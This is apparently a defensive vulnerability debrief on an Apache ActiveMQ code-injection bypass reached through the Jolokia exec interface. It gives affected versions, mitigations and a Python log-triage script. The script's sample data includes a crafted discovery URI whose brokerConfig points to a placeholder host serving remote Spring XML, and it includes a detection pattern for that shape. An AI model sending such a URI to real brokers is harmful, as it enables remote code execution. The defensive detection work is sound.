PatchSiren cyber security CVE debrief

CVE-2026-45505 Apache Software Foundation CVE debrief

Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ are affected by an improper input validation and code injection vulnerability. Non-parenthesized discovery wrappers, specifically `masterslave:vm://...,...` and `static:vm://...`, incorrectly pass validation and so bypass the fix for CVE-2026-34197. An authenticated attacker with access to the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console can invoke exec operations on ActiveMQ MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). A crafted discovery URI causes the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because Spring instantiates singleton beans before BrokerService validates the configuration, arbitrary code runs on the broker's JVM through bean factory methods such as Runtime.exec(). For all three product variants, affected versions are those before 5.19.7, and 6.0.0 up to but not including 6.2.6. The fix is present in 5.19.7 and 6.2.6.

Vendor
Apache Software Foundation
Product
Apache ActiveMQ Broker
CVSS
HIGH 8.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-01
Original CVE updated
2026-06-01
Advisory published
2026-06-01
Advisory updated
2026-06-01

Who should care

Organizations running Apache ActiveMQ Broker, ActiveMQ All, or ActiveMQ versions prior to 5.19.7 or in the 6.x range prior to 6.2.6, especially those exposing the web console or Jolokia /api/jolokia/ endpoint to networks reachable by potential attackers. Security teams should prioritize patching due to the authenticated but high-impact remote code execution vector.

Technical summary

The vulnerability exists in the validation logic for ActiveMQ discovery URIs. The original fix for CVE-2026-34197 did not account for non-parenthesized wrapper syntax such as `masterslave:vm://...,...` and `static:vm://...`. When such a URI is supplied through the Jolokia exec interface to BrokerService.addNetworkConnector or addConnector, the VM transport parses the brokerConfig parameter and loads a remote Spring XML context using ResourceXmlApplicationContext. Spring's eager singleton instantiation executes bean factory methods—including Runtime.exec()—before ActiveMQ's BrokerService performs its own configuration validation, resulting in arbitrary code execution on the broker JVM. The attack requires authenticated access to the Jolokia endpoint.

Defensive priority

critical

Recommended defensive actions

  • Upgrade Apache ActiveMQ Broker, ActiveMQ All, or ActiveMQ to 5.19.7 or later on the 5.x line, or to 6.2.6 or later on the 6.x line.
  • If immediate patching is not feasible, restrict network access to the ActiveMQ web console and the /api/jolokia/ endpoint to trusted administrative hosts only.
  • Review authentication controls on the Jolokia JMX-HTTP bridge; ensure strong credentials and, where possible, limit Jolokia access policies to disallow exec operations on sensitive MBeans.
  • Monitor for unexpected network connector or broker configuration changes, and audit logs for exec invocations on org.apache.activemq:* MBeans.
  • Assess whether any prior exploitation of CVE-2026-34197 occurred in the environment, as this CVE represents a bypass of that earlier fix.
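
As an added example (not PatchSiren's or Apache's code) of the log-review action above: a triage script that flags Jolokia exec requests against the BrokerService operations named in this debrief and escalates when an argument carries a masterslave:/static: wrapper around a vm:// transport with a brokerConfig parameter, parenthesized or not. The request fields (type, mbean, operation, arguments) follow Jolokia's JSON protocol; the sample requests and the brokerConfig host are constructed.

```python
"""Triage Jolokia exec requests for the CVE-2026-45505 attack path.
Added example (not PatchSiren or Apache code); records are constructed
samples in Jolokia's JSON request shape: type / mbean / operation / arguments."""
import json
import re

# BrokerService operations the advisory names as reachable through exec.
SENSITIVE_OPS = ("addNetworkConnector", "addConnector")

# masterslave:/static: wrapper, parenthesized or not (the earlier fix only
# caught the parenthesized form), around a vm:// transport that carries a
# brokerConfig parameter, the setting that makes it load a Spring XML context.
BYPASS_RE = re.compile(
    r"^(?:masterslave|static):\(?vm://[^\s,)]*\?[^\s,)]*brokerConfig=", re.I)

def classify(request: dict) -> str:
    """Return 'none', 'review' or 'high' for one Jolokia request object."""
    if request.get("type") != "exec":
        return "none"
    if not str(request.get("mbean", "")).startswith("org.apache.activemq:"):
        return "none"
    if not str(request.get("operation", "")).startswith(SENSITIVE_OPS):
        return "none"
    # Any exec of these operations merits review; a wrapped vm:// URI with
    # brokerConfig in the argument is the bypass shape the CVE describes.
    for arg in request.get("arguments") or []:
        if isinstance(arg, str) and BYPASS_RE.search(arg.strip()):
            return "high"
    return "review"

def scan(body: str) -> list:
    """Scan one Jolokia POST body (single object or bulk list); return
    (index, operation, verdict) for every request that is not 'none'."""
    data = json.loads(body)
    requests = data if isinstance(data, list) else [data]
    return [(i, str(r.get("operation", "")), classify(r))
            for i, r in enumerate(requests) if classify(r) != "none"]

# Constructed sample bulk request; the brokerConfig host is a placeholder.
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_BODY = json.dumps([
    {"type": "read", "mbean": BROKER, "attribute": "TotalMessageCount"},
    {"type": "exec", "mbean": BROKER,
     "operation": "addNetworkConnector(java.lang.String)",
     "arguments": ["static:(tcp://peer.example.internal:61616)"]},
    {"type": "exec", "mbean": BROKER, "operation": "addConnector(java.lang.String)",
     "arguments": ["static:vm://localhost?brokerConfig=http://PLACEHOLDER-HOST/ctx.xml"]},
])
```

Running `scan(SAMPLE_BODY)` yields a "review" finding for the ordinary network connector and a "high" finding for the vm:// request, which is the distinction worth alerting on.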

Evidence notes

Vulnerability description and affected versions drawn from official CVE text. The bypass mechanism (non-parenthesized discovery wrappers) and the underlying attack path via Jolokia exec operations and ResourceXmlApplicationContext are explicitly documented in the CVE description. Fix versions 5.19.7 and 6.2.6 are stated in the official advisory. Timeline dates use the CVE published/modified timestamp of 2026-06-01T09:16:19.700Z.
